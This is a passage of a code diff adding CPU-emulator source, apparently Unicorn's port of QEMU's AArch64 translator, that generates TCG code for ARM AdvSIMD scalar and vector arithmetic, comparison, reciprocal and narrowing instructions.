+ tcg_temp_free_i64(tcg_ctx, tcg_res); + } +} + +static void handle_3same_64(DisasContext *s, int opcode, bool u, + TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, TCGv_i64 tcg_rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Handle 64x64->64 opcodes which are shared between the scalar + * and vector 3-same groups. We cover every opcode where size == 3 + * is valid in either the three-reg-same (integer, not pairwise) + * or scalar-three-reg-same groups. (Some opcodes are not yet + * implemented.) + */ + TCGCond cond; + + switch (opcode) { + case 0x1: /* SQADD */ + if (u) { + gen_helper_neon_qadd_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } else { + gen_helper_neon_qadd_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } + break; + case 0x5: /* SQSUB */ + if (u) { + gen_helper_neon_qsub_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } else { + gen_helper_neon_qsub_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } + break; + case 0x6: /* CMGT, CMHI */ + /* 64 bit integer comparison, result = test ? (2^64 - 1) : 0. + * We implement this using setcond (test) and then negating. + */ + cond = u ? TCG_COND_GTU : TCG_COND_GT; + do_cmop: + tcg_gen_setcond_i64(tcg_ctx, cond, tcg_rd, tcg_rn, tcg_rm); + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); + break; + case 0x7: /* CMGE, CMHS */ + cond = u ? TCG_COND_GEU : TCG_COND_GE; + goto do_cmop; + case 0x11: /* CMTST, CMEQ */ + if (u) { + cond = TCG_COND_EQ; + goto do_cmop; + } + /* CMTST : test is "if (X & Y != 0)". */ + tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, tcg_rd, tcg_rd, 0); + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); + break; + case 0x8: /* SSHL, USHL */ + if (u) { + gen_helper_neon_shl_u64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + } else { + gen_helper_neon_shl_s64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + } + break; + case 0x9: /* SQSHL, UQSHL */ + if (u) { + gen_helper_neon_qshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } else { + gen_helper_neon_qshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } + break; + case 0xa: /* SRSHL, URSHL */ + if (u) { + gen_helper_neon_rshl_u64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + } else { + gen_helper_neon_rshl_s64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + } + break; + case 0xb: /* SQRSHL, UQRSHL */ + if (u) { + gen_helper_neon_qrshl_u64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } else { + gen_helper_neon_qrshl_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + } + break; + case 0x10: /* ADD, SUB */ + if (u) { + tcg_gen_sub_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); + } + break; + default: + g_assert_not_reached(); + } +} + +/* Handle the 3-same-operands float operations; shared by the scalar + * and vector encodings. The caller must filter out any encodings + * not allocated for the encoding it is dealing with. + */ +static void handle_3same_float(DisasContext *s, int size, int elements, + int fpopcode, int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int pass; + TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx); + + for (pass = 0; pass < elements; pass++) { + if (size) { + /* Double */ + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element(s, tcg_op2, rm, pass, MO_64); + + switch (fpopcode) { + case 0x39: /* FMLS */ + /* As usual for ARM, separate negation for fused multiply-add */ + gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1); + /* fall through */ + case 0x19: /* FMLA */ + read_vec_element(s, tcg_res, rd, pass, MO_64); + gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, + tcg_res, fpst); + break; + case 0x18: /* FMAXNM */ + gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1a: /* FADD */ + gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1b: /* FMULX */ + gen_helper_vfp_mulxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1c: /* FCMEQ */ + gen_helper_neon_ceq_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1e: /* FMAX */ + gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1f: /* FRECPS */ + gen_helper_recpsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x38: /* FMINNM */ + gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3a: /* FSUB */ + gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3e: /* FMIN */ + gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3f: /* FRSQRTS */ + gen_helper_rsqrtsf_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5b: /* FMUL */ + gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5c: /* FCMGE */ + gen_helper_neon_cge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5d: /* FACGE */ + gen_helper_neon_acge_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5f: /* FDIV */ + gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x7a: /* FABD */ + gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_res); + break; + case 0x7c: /* FCMGT */ + gen_helper_neon_cgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x7d: /* FACGT */ + gen_helper_neon_acgt_f64(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + write_vec_element(s, tcg_res, rd, pass, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } else { + /* Single */ + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op1, rn, pass, MO_32); + read_vec_element_i32(s, tcg_op2, rm, pass, MO_32); + + switch (fpopcode) { + case 0x39: /* FMLS */ + /* As usual for ARM, separate negation for fused multiply-add */ + gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1); + /* fall through */ + case 0x19: /* FMLA */ + read_vec_element_i32(s, tcg_res, rd, pass, MO_32); + gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, + tcg_res, fpst); + break; + case 0x1a: /* FADD */ + gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1b: /* FMULX */ + gen_helper_vfp_mulxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1c: /* FCMEQ */ + gen_helper_neon_ceq_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1e: /* FMAX */ + gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x1f: /* FRECPS */ + gen_helper_recpsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x18: /* FMAXNM */ + gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x38: /* FMINNM */ + gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3a: /* FSUB */ + gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3e: /* FMIN */ + gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x3f: /* FRSQRTS */ + gen_helper_rsqrtsf_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5b: /* FMUL */ + gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5c: /* FCMGE */ + gen_helper_neon_cge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5d: /* FACGE */ + gen_helper_neon_acge_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x5f: /* FDIV */ + gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x7a: /* FABD */ + gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_res); + break; + case 0x7c: /* FCMGT */ + gen_helper_neon_cgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + case 0x7d: /* FACGT */ + gen_helper_neon_acgt_f32(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + if (elements == 1) { + /* scalar single so clear high part */ + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, tcg_tmp, tcg_res); + write_vec_element(s, tcg_tmp, rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + } else { + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + } + + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + } + } + + tcg_temp_free_ptr(tcg_ctx, fpst); + + if ((elements << size) < 4) { + /* scalar, or non-quad vector op */ + clear_vec_high(s, rd); + } +} + +/* C3.6.11 AdvSIMD scalar three same + * 31 30 29 28 24 23 22 21 20 16 15 11 10 9 5 4 0 + * +-----+---+-----------+------+---+------+--------+---+------+------+ + * | 0 1 | U | 1 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | + * +-----+---+-----------+------+---+------+--------+---+------+------+ + */ +static void disas_simd_scalar_three_reg_same(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int opcode = extract32(insn, 11, 5); + int rm = extract32(insn, 16, 5); + int size = extract32(insn, 22, 2); + bool u = extract32(insn, 29, 1); + TCGv_i64 tcg_rd; + + if (opcode >= 0x18) { + /* Floating point: U, size[1] and opcode indicate operation */ + int fpopcode = opcode | (extract32(size, 1, 1) << 5) | (u << 6); + switch (fpopcode) { + case 0x1b: /* FMULX */ + case 0x1f: /* FRECPS */ + case 0x3f: /* FRSQRTS */ + case 0x5d: /* FACGE */ + case 0x7d: /* FACGT */ + case 0x1c: /* FCMEQ */ + case 0x5c: /* FCMGE */ + case 0x7c: /* FCMGT */ + case 0x7a: /* FABD */ + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + handle_3same_float(s, extract32(size, 0, 1), 1, fpopcode, rd, rn, rm); + return; + } + + switch (opcode) { + case 0x1: /* SQADD, UQADD */ + case 0x5: /* SQSUB, UQSUB */ + case 0x9: /* SQSHL, UQSHL */ + case 0xb: /* SQRSHL, UQRSHL */ + break; + case 0x8: /* SSHL, USHL */ + case 0xa: /* SRSHL, URSHL */ + case 0x6: /* CMGT, CMHI */ + case 0x7: /* CMGE, CMHS */ + case 0x11: /* CMTST, CMEQ */ + case 0x10: /* ADD, SUB (vector) */ + if (size != 3) { + unallocated_encoding(s); + return; + } + break; + case 0x16: /* SQDMULH, SQRDMULH (vector) */ + if (size != 1 && size != 2) { + unallocated_encoding(s); + return; + } + break; + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + tcg_rd = tcg_temp_new_i64(tcg_ctx); + + if (size == 3) { + TCGv_i64 tcg_rn = read_fp_dreg(s, rn); + TCGv_i64 tcg_rm = read_fp_dreg(s, rm); + + handle_3same_64(s, opcode, u, tcg_rd, tcg_rn, tcg_rm); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + tcg_temp_free_i64(tcg_ctx, tcg_rm); + } else { + /* Do a single operation on the lowest element in the vector. + * We use the standard Neon helpers and rely on 0 OP 0 == 0 with + * no side effects for all these operations. + * OPTME: special-purpose helpers would avoid doing some + * unnecessary work in the helper for the 8 and 16 bit cases. + */ + NeonGenTwoOpEnvFn *genenvfn; + TCGv_i32 tcg_rn = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rm = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_rd32 = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_rn, rn, 0, size); + read_vec_element_i32(s, tcg_rm, rm, 0, size); + + switch (opcode) { + case 0x1: /* SQADD, UQADD */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qadd_s8, gen_helper_neon_qadd_u8 }, + { gen_helper_neon_qadd_s16, gen_helper_neon_qadd_u16 }, + { gen_helper_neon_qadd_s32, gen_helper_neon_qadd_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x5: /* SQSUB, UQSUB */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qsub_s8, gen_helper_neon_qsub_u8 }, + { gen_helper_neon_qsub_s16, gen_helper_neon_qsub_u16 }, + { gen_helper_neon_qsub_s32, gen_helper_neon_qsub_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x9: /* SQSHL, UQSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, + { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, + { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0xb: /* SQRSHL, UQRSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, + { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, + { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x16: /* SQDMULH, SQRDMULH */ + { + static NeonGenTwoOpEnvFn * const fns[2][2] = { + { gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, + { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, + }; + assert(size == 1 || size == 2); + genenvfn = fns[size - 1][u]; + break; + } + default: + g_assert_not_reached(); + } + + genenvfn(tcg_ctx, tcg_rd32, tcg_ctx->cpu_env, tcg_rn, tcg_rm); + tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd32); + tcg_temp_free_i32(tcg_ctx, tcg_rd32); + tcg_temp_free_i32(tcg_ctx, tcg_rn); + tcg_temp_free_i32(tcg_ctx, tcg_rm); + } + + write_fp_dreg(s, rd, tcg_rd); + + tcg_temp_free_i64(tcg_ctx, tcg_rd); +} + +static void handle_2misc_64(DisasContext *s, int opcode, bool u, + TCGv_i64 tcg_rd, TCGv_i64 tcg_rn, + TCGv_i32 tcg_rmode, TCGv_ptr tcg_fpstatus) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Handle 64->64 opcodes which are shared between the scalar and + * vector 2-reg-misc groups. We cover every integer opcode where size == 3 + * is valid in either group and also the double-precision fp ops. + * The caller only need provide tcg_rmode and tcg_fpstatus if the op + * requires them. + */ + TCGCond cond; + + switch (opcode) { + case 0x4: /* CLS, CLZ */ + if (u) { + gen_helper_clz64(tcg_ctx, tcg_rd, tcg_rn); + } else { + gen_helper_cls64(tcg_ctx, tcg_rd, tcg_rn); + } + break; + case 0x5: /* NOT */ + /* This opcode is shared with CNT and RBIT but we have earlier + * enforced that size == 3 if and only if this is the NOT insn. + */ + tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rn); + break; + case 0x7: /* SQABS, SQNEG */ + if (u) { + gen_helper_neon_qneg_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); + } else { + gen_helper_neon_qabs_s64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rn); + } + break; + case 0xa: /* CMLT */ + /* 64 bit integer comparison against zero, result is + * test ? (2^64 - 1) : 0. We implement via setcond(!test) and + * subtracting 1. + */ + cond = TCG_COND_LT; + do_cmop: + tcg_gen_setcondi_i64(tcg_ctx, cond, tcg_rd, tcg_rn, 0); + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); + break; + case 0x8: /* CMGT, CMGE */ + cond = u ? TCG_COND_GE : TCG_COND_GT; + goto do_cmop; + case 0x9: /* CMEQ, CMLE */ + cond = u ? TCG_COND_LE : TCG_COND_EQ; + goto do_cmop; + case 0xb: /* ABS, NEG */ + if (u) { + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rn); + } else { + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rn); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GT, tcg_rd, tcg_rn, tcg_zero, + tcg_rn, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_zero); + } + break; + case 0x2f: /* FABS */ + gen_helper_vfp_absd(tcg_ctx, tcg_rd, tcg_rn); + break; + case 0x6f: /* FNEG */ + gen_helper_vfp_negd(tcg_ctx, tcg_rd, tcg_rn); + break; + case 0x7f: /* FSQRT */ + gen_helper_vfp_sqrtd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); + break; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x1c: /* FCVTAS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_tosqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x5c: /* FCVTAU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_touqd(tcg_ctx, tcg_rd, tcg_rn, tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x18: /* FRINTN */ + case 0x19: /* FRINTM */ + case 0x38: /* FRINTP */ + case 0x39: /* FRINTZ */ + case 0x58: /* FRINTA */ + case 0x79: /* FRINTI */ + gen_helper_rintd(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); + break; + case 0x59: /* FRINTX */ + gen_helper_rintd_exact(tcg_ctx, tcg_rd, tcg_rn, tcg_fpstatus); + break; + default: + g_assert_not_reached(); + } +} + +static void handle_2misc_fcmp_zero(DisasContext *s, int opcode, + bool is_scalar, bool is_u, bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = (size == 3); + TCGv_ptr fpst; + + if (!fp_access_check(s)) { + return; + } + + fpst = get_fpstatus_ptr(tcg_ctx); + + if (is_double) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + NeonGenTwoDoubleOPFn *genfn; + bool swap = false; + int pass; + + switch (opcode) { + case 0x2e: /* FCMLT (zero) */ + swap = true; + /* fallthrough */ + case 0x2c: /* FCMGT (zero) */ + genfn = gen_helper_neon_cgt_f64; + break; + case 0x2d: /* FCMEQ (zero) */ + genfn = gen_helper_neon_ceq_f64; + break; + case 0x6d: /* FCMLE (zero) */ + swap = true; + /* fall through */ + case 0x6c: /* FCMGE (zero) */ + genfn = gen_helper_neon_cge_f64; + break; + default: + g_assert_not_reached(); + } + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + read_vec_element(s, tcg_op, rn, pass, MO_64); + if (swap) { + genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); + } else { + genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); + } + write_vec_element(s, tcg_res, rd, pass, MO_64); + } + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_zero); + tcg_temp_free_i64(tcg_ctx, tcg_op); + } else { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + NeonGenTwoSingleOPFn *genfn; + bool swap = false; + int pass, maxpasses; + + switch (opcode) { + case 0x2e: /* FCMLT (zero) */ + swap = true; + /* fall through */ + case 0x2c: /* FCMGT (zero) */ + genfn = gen_helper_neon_cgt_f32; + break; + case 0x2d: /* FCMEQ (zero) */ + genfn = gen_helper_neon_ceq_f32; + break; + case 0x6d: /* FCMLE (zero) */ + swap = true; + /* fall through */ + case 0x6c: /* FCMGE (zero) */ + genfn = gen_helper_neon_cge_f32; + break; + default: + g_assert_not_reached(); + } + + if (is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 4 : 2; + } + + for (pass = 0; pass < maxpasses; pass++) { + read_vec_element_i32(s, tcg_op, rn, pass, MO_32); + if (swap) { + genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op, fpst); + } else { + genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero, fpst); + } + if (is_scalar) { + write_fp_sreg(s, rd, tcg_res); + } else { + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + } + } + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_zero); + tcg_temp_free_i32(tcg_ctx, tcg_op); + if (!is_q && !is_scalar) { + clear_vec_high(s, rd); + } + } + + tcg_temp_free_ptr(tcg_ctx, fpst); +} + +static void handle_2misc_reciprocal(DisasContext *s, int opcode, + bool is_scalar, bool is_u, bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_double = (size == 3); + TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx); + + if (is_double) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + int pass; + + for (pass = 0; pass < (is_scalar ? 1 : 2); pass++) { + read_vec_element(s, tcg_op, rn, pass, MO_64); + switch (opcode) { + case 0x3d: /* FRECPE */ + gen_helper_recpe_f64(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x3f: /* FRECPX */ + gen_helper_frecpx_f64(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x7d: /* FRSQRTE */ + gen_helper_rsqrte_f64(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + g_assert_not_reached(); + } + write_vec_element(s, tcg_res, rd, pass, MO_64); + } + if (is_scalar) { + clear_vec_high(s, rd); + } + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_op); + } else { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + int pass, maxpasses; + + if (is_scalar) { + maxpasses = 1; + } else { + maxpasses = is_q ? 4 : 2; + } + + for (pass = 0; pass < maxpasses; pass++) { + read_vec_element_i32(s, tcg_op, rn, pass, MO_32); + + switch (opcode) { + case 0x3c: /* URECPE */ + gen_helper_recpe_u32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x3d: /* FRECPE */ + gen_helper_recpe_f32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x3f: /* FRECPX */ + gen_helper_frecpx_f32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + case 0x7d: /* FRSQRTE */ + gen_helper_rsqrte_f32(tcg_ctx, tcg_res, tcg_op, fpst); + break; + default: + g_assert_not_reached(); + } + + if (is_scalar) { + write_fp_sreg(s, rd, tcg_res); + } else { + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + } + } + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_op); + if (!is_q && !is_scalar) { + clear_vec_high(s, rd); + } + } + tcg_temp_free_ptr(tcg_ctx, fpst); +} + +static void handle_2misc_narrow(DisasContext *s, bool scalar, + int opcode, bool u, bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Handle 2-reg-misc ops which are narrowing (so each 2*size element + * in the source becomes a size element in the destination). + */ + int pass; + TCGv_i32 tcg_res[2]; + int destelt = is_q ? 2 : 0; + int passes = scalar ? 1 : 2; + + if (scalar) { + tcg_res[1] = tcg_const_i32(tcg_ctx, 0); + } + + for (pass = 0; pass < passes; pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + NeonGenNarrowFn *genfn = NULL; + NeonGenNarrowEnvFn *genenvfn = NULL; + + if (scalar) { + read_vec_element(s, tcg_op, rn, pass, size + 1); + } else { + read_vec_element(s, tcg_op, rn, pass, MO_64); + } + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + + switch (opcode) { + case 0x12: /* XTN, SQXTUN */ + { + static NeonGenNarrowFn * const xtnfns[3] = { + gen_helper_neon_narrow_u8, + gen_helper_neon_narrow_u16, + tcg_gen_trunc_i64_i32, + }; + static NeonGenNarrowEnvFn * const sqxtunfns[3] = { + gen_helper_neon_unarrow_sat8, + gen_helper_neon_unarrow_sat16, + gen_helper_neon_unarrow_sat32, + }; + if (u) { + genenvfn = sqxtunfns[size]; + } else { + genfn = xtnfns[size]; + } + break; + } + case 0x14: /* SQXTN, UQXTN */ + { + static NeonGenNarrowEnvFn * const fns[3][2] = { + { gen_helper_neon_narrow_sat_s8, + gen_helper_neon_narrow_sat_u8 }, + { gen_helper_neon_narrow_sat_s16, + gen_helper_neon_narrow_sat_u16 }, + { gen_helper_neon_narrow_sat_s32, + gen_helper_neon_narrow_sat_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x16: /* FCVTN, FCVTN2 */ + /* 32 bit to 16 bit or 64 bit to 32 bit float conversion */ + if (size == 2) { + gen_helper_vfp_fcvtsd(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); + } else { + TCGv_i32 tcg_lo = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_hi = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_lo, tcg_op); + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_lo, tcg_lo, tcg_ctx->cpu_env); + tcg_gen_shri_i64(tcg_ctx, tcg_op, tcg_op, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_hi, tcg_op); + gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_hi, tcg_hi, tcg_ctx->cpu_env); + tcg_gen_deposit_i32(tcg_ctx, tcg_res[pass], tcg_lo, tcg_hi, 16, 16); + tcg_temp_free_i32(tcg_ctx, tcg_lo); + tcg_temp_free_i32(tcg_ctx, tcg_hi); + } + break; + case 0x56: /* FCVTXN, FCVTXN2 */ + /* 64 bit to 32 bit float conversion + * with von Neumann rounding (round to odd) + */ + assert(size == 2); + gen_helper_fcvtx_f64_to_f32(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); + break; + default: + g_assert_not_reached(); + } + + if (genfn) { + genfn(tcg_ctx, tcg_res[pass], tcg_op); + } else if (genenvfn) { + genenvfn(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, tcg_op); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, destelt + pass, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + if (!is_q) { + clear_vec_high(s, rd); + } +} + +/* Remaining saturating accumulating ops */ +static void handle_2misc_satacc(DisasContext *s, bool is_scalar, bool is_u, + bool is_q, int size, int rn, int 